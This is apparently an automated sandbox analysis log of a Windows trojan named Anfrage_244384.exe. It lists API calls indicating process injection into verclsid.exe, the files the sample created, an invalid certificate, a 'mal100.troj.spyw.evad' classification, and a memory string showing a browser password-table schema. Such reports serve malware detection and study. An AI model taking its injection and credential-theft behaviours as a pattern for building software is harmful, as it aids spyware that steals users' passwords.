Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_045D2BF0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2BE0 NtQueryValueKey,LdrInitializeThunk,	7_2_045D2BE0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2BA0 NtEnumerateValueKey,LdrInitializeThunk,	7_2_045D2BA0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D35C0 NtCreateMutant,LdrInitializeThunk,	7_2_045D35C0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D39B0 NtGetContextThread,LdrInitializeThunk,	7_2_045D39B0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2C00 NtQueryInformationProcess,	7_2_045D2C00
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2CC0 NtQueryVirtualMemory,	7_2_045D2CC0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2CF0 NtOpenProcess,	7_2_045D2CF0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2D00 NtSetInformationFile,	7_2_045D2D00
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2DB0 NtEnumerateKey,	7_2_045D2DB0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2E30 NtWriteVirtualMemory,	7_2_045D2E30
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2EA0 NtAdjustPrivilegesToken,	7_2_045D2EA0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2F60 NtCreateProcessEx,	7_2_045D2F60
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2F90 NtProtectVirtualMemory,	7_2_045D2F90
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2FA0 NtQuerySection,	7_2_045D2FA0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2AB0 NtWaitForSingleObject,	7_2_045D2AB0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2B80 NtQueryInformationFile,	7_2_045D2B80
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D3010 NtOpenDirectoryObject,	7_2_045D3010
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D3090 NtSetValueKey,	7_2_045D3090
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D3D70 NtOpenThread,	7_2_045D3D70
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D3D10 NtOpenProcessToken,	7_2_045D3D10
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003D8F80 NtCreateFile,	7_2_003D8F80
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003D90F0 NtReadFile,	7_2_003D90F0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003D91F0 NtDeleteFile,	7_2_003D91F0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003D9290 NtClose,	7_2_003D9290
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003D93F0 NtAllocateVirtualMemory,	7_2_003D93F0

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Code function: 0_2_004031A3 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_004031A3

Source: C:\Users\user\Desktop\Anfrage_244384.exe

File created: C:\Windows\resources\soenderbro.ini

Jump to behavior

Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 0_2_00404959	0_2_00404959
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 0_2_0040655F	0_2_0040655F
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 0_2_00406D36	0_2_00406D36
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34671460	4_2_34671460
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473F43F	4_2_3473F43F
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34737571	4_2_34737571
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471D5B0	4_2_3471D5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346C5630	4_2_346C5630
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347316CC	4_2_347316CC
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473F7B0	4_2_3473F7B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473F0E0	4_2_3473F0E0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347370E9	4_2_347370E9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0	4_2_346870C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472F0CC	4_2_3472F0CC
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B516C	4_2_346B516C
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172	4_2_3466F172
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3474B16B	4_2_3474B16B
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468B1B0	4_2_3468B1B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347212ED	4_2_347212ED
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469B2C0	4_2_3469B2C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346852A0	4_2_346852A0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466D34C	4_2_3466D34C
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473132D	4_2_3473132D
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346C739A	4_2_346C739A
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F9C32	4_2_346F9C32
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473FCF2	4_2_3473FCF2
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34737D73	4_2_34737D73
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34683D40	4_2_34683D40
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34731D5A	4_2_34731D5A
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469FDC0	4_2_3469FDC0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34689EB0	4_2_34689EB0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473FF09	4_2_3473FF09
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34643FD5	4_2_34643FD5
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34643FD2	4_2_34643FD2
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473FFB1	4_2_3473FFB1
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681F92	4_2_34681F92
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ED800	4_2_346ED800
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346838E0	4_2_346838E0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34689950	4_2_34689950
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469B950	4_2_3469B950
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34715910	4_2_34715910
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F3A6C	4_2_346F3A6C
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34737A46	4_2_34737A46
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473FA49	4_2_3473FA49
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472DAC6	4_2_3472DAC6
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346C5AA0	4_2_346C5AA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34721AA3	4_2_34721AA3
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471DAAC	4_2_3471DAAC
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473FB76	4_2_3473FB76
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346BDBF9	4_2_346BDBF9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F5BF0	4_2_346F5BF0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469FB80	4_2_3469FB80
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34732446	4_2_34732446
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34724420	4_2_34724420
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472E4F6	4_2_3472E4F6
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34680535	4_2_34680535
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34740591	4_2_34740591
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469C6E0	4_2_3469C6E0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34680770	4_2_34680770
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A4750	4_2_346A4750
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467C7C0	4_2_3467C7C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34712000	4_2_34712000
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34708158	4_2_34708158
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34670100	4_2_34670100
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471A118	4_2_3471A118
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347381CC	4_2_347381CC
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347341A2	4_2_347341A2
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347401AA	4_2_347401AA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34720274	4_2_34720274
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347002C0	4_2_347002C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473A352	4_2_3473A352
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347403E6	4_2_347403E6
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468E3F0	4_2_3468E3F0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34680C00	4_2_34680C00
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34670CF2	4_2_34670CF2
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34720CB5	4_2_34720CB5
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468AD00	4_2_3468AD00
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471CD1F	4_2_3471CD1F
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467ADE0	4_2_3467ADE0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34698DBF	4_2_34698DBF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34680E59	4_2_34680E59
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473EE26	4_2_3473EE26
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473EEDB	4_2_3473EEDB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473CE93	4_2_3473CE93
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34692E90	4_2_34692E90
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F4F40	4_2_346F4F40
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34722F30	4_2_34722F30
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346C2F28	4_2_346C2F28
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A0F30	4_2_346A0F30
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468CFE0	4_2_3468CFE0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34672FC8	4_2_34672FC8
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FEFA0	4_2_346FEFA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468A840	4_2_3468A840
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34682840	4_2_34682840
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346AE8F0	4_2_346AE8F0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346668B8	4_2_346668B8
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34696962	4_2_34696962
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346829A0	4_2_346829A0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3474A9A6	4_2_3474A9A6
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467EA80	4_2_3467EA80
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473AB40	4_2_3473AB40
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34736BD7	4_2_34736BD7
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04652446	7_2_04652446
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04644420	7_2_04644420
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0464E4F6	7_2_0464E4F6
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A0535	7_2_045A0535
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04660591	7_2_04660591
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045BC6E0	7_2_045BC6E0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045C4750	7_2_045C4750
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A0770	7_2_045A0770
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0459C7C0	7_2_0459C7C0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04632000	7_2_04632000
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04628158	7_2_04628158
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04590100	7_2_04590100
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0463A118	7_2_0463A118
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_046581CC	7_2_046581CC
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_046601AA	7_2_046601AA
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04640274	7_2_04640274
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_046202C0	7_2_046202C0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465A352	7_2_0465A352
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_046603E6	7_2_046603E6
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045AE3F0	7_2_045AE3F0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A0C00	7_2_045A0C00
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04590CF2	7_2_04590CF2
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04640CB5	7_2_04640CB5
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045AAD00	7_2_045AAD00
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0463CD1F	7_2_0463CD1F
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0459ADE0	7_2_0459ADE0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045B8DBF	7_2_045B8DBF
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A0E59	7_2_045A0E59
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465EE26	7_2_0465EE26
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465EEDB	7_2_0465EEDB
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045B2E90	7_2_045B2E90
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465CE93	7_2_0465CE93
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04614F40	7_2_04614F40
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04642F30	7_2_04642F30
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045C0F30	7_2_045C0F30
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045E2F28	7_2_045E2F28
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04592FC8	7_2_04592FC8
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045ACFE0	7_2_045ACFE0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0461EFA0	7_2_0461EFA0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A2840	7_2_045A2840
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045AA840	7_2_045AA840
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045CE8F0	7_2_045CE8F0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045868B8	7_2_045868B8
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045B6962	7_2_045B6962
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0466A9A6	7_2_0466A9A6
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A29A0	7_2_045A29A0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0459EA80	7_2_0459EA80
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465AB40	7_2_0465AB40
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04656BD7	7_2_04656BD7
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04591460	7_2_04591460
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465F43F	7_2_0465F43F
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04657571	7_2_04657571
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0463D5B0	7_2_0463D5B0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_046516CC	7_2_046516CC
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465F7B0	7_2_0465F7B0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465F0E0	7_2_0465F0E0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_046570E9	7_2_046570E9
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A70C0	7_2_045A70C0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0464F0CC	7_2_0464F0CC
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0466B16B	7_2_0466B16B
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0458F172	7_2_0458F172
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D516C	7_2_045D516C
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045AB1B0	7_2_045AB1B0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_046412ED	7_2_046412ED
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045BB2C0	7_2_045BB2C0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A52A0	7_2_045A52A0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0458D34C	7_2_0458D34C
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465132D	7_2_0465132D
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045E739A	7_2_045E739A
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04619C32	7_2_04619C32
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465FCF2	7_2_0465FCF2
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04657D73	7_2_04657D73
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A3D40	7_2_045A3D40
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04651D5A	7_2_04651D5A
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045BFDC0	7_2_045BFDC0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A9EB0	7_2_045A9EB0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465FF09	7_2_0465FF09
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A1F92	7_2_045A1F92
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465FFB1	7_2_0465FFB1
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0460D800	7_2_0460D800
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A38E0	7_2_045A38E0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A9950	7_2_045A9950
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045BB950	7_2_045BB950
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04635910	7_2_04635910
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04613A6C	7_2_04613A6C
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04657A46	7_2_04657A46
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465FA49	7_2_0465FA49
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0464DAC6	7_2_0464DAC6
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04641AA3	7_2_04641AA3
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0463DAAC	7_2_0463DAAC
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045E5AA0	7_2_045E5AA0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465FB76	7_2_0465FB76
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04615BF0	7_2_04615BF0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045DDBF9	7_2_045DDBF9
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045BFB80	7_2_045BFB80
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003C1BC0	7_2_003C1BC0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003BCAC0	7_2_003BCAC0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003BCCE0	7_2_003BCCE0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003BAD60	7_2_003BAD60
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003BAEA4	7_2_003BAEA4
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003B1122	7_2_003B1122
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003C5220	7_2_003C5220
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003C3460	7_2_003C3460
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003DB8C0	7_2_003DB8C0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BE65C	7_2_048BE65C
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BE7EF	7_2_048BE7EF
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BD728	7_2_048BD728
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BE1A5	7_2_048BE1A5
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BE2C3	7_2_048BE2C3

Source: C:\Windows\SysWOW64\verclsid.exe	Code function: String function: 045D5130 appears 58 times
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: String function: 045E7E54 appears 102 times
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: String function: 0460EA12 appears 86 times
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: String function: 0458B970 appears 280 times
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: String function: 0461F290 appears 105 times
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: String function: 346EEA12 appears 82 times
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: String function: 3466B970 appears 280 times
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: String function: 346C7E54 appears 103 times
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: String function: 346B5130 appears 58 times
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: String function: 346FF290 appears 103 times

Source: Anfrage_244384.exe

Static PE information: invalid certificate

Source: Anfrage_244384.exe, 00000004.00000003.2992504596.0000000034403000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Anfrage_244384.exe
Source: Anfrage_244384.exe, 00000004.00000002.3092495841.00000000043DF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameverclsid.exej% vs Anfrage_244384.exe
Source: Anfrage_244384.exe, 00000004.00000003.2995103933.00000000345BF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Anfrage_244384.exe
Source: Anfrage_244384.exe, 00000004.00000002.3092495841.0000000004423000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameverclsid.exej% vs Anfrage_244384.exe
Source: Anfrage_244384.exe, 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Anfrage_244384.exe

Source: Anfrage_244384.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/11@2/2

Source: C:\Users\user\Desktop\Anfrage_244384.exe

0_2_004031A3

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Code function: 0_2_004043E6 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_004043E6

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Code function: 0_2_004020CD CoCreateInstance,MultiByteToWideChar,

0_2_004020CD

Source: C:\Users\user\Desktop\Anfrage_244384.exe

File created: C:\Users\user\AppData\Roaming\secretaryships

Jump to behavior

Source: C:\Users\user\Desktop\Anfrage_244384.exe

File created: C:\Users\user\AppData\Local\Temp\nsgA5D8.tmp

Jump to behavior

Source: Anfrage_244384.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Anfrage_244384.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: verclsid.exe, 00000007.00000003.3288960229.0000000000855000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3361368137.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.3288960229.0000000000876000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3361368137.0000000000876000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.3291082475.0000000000881000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

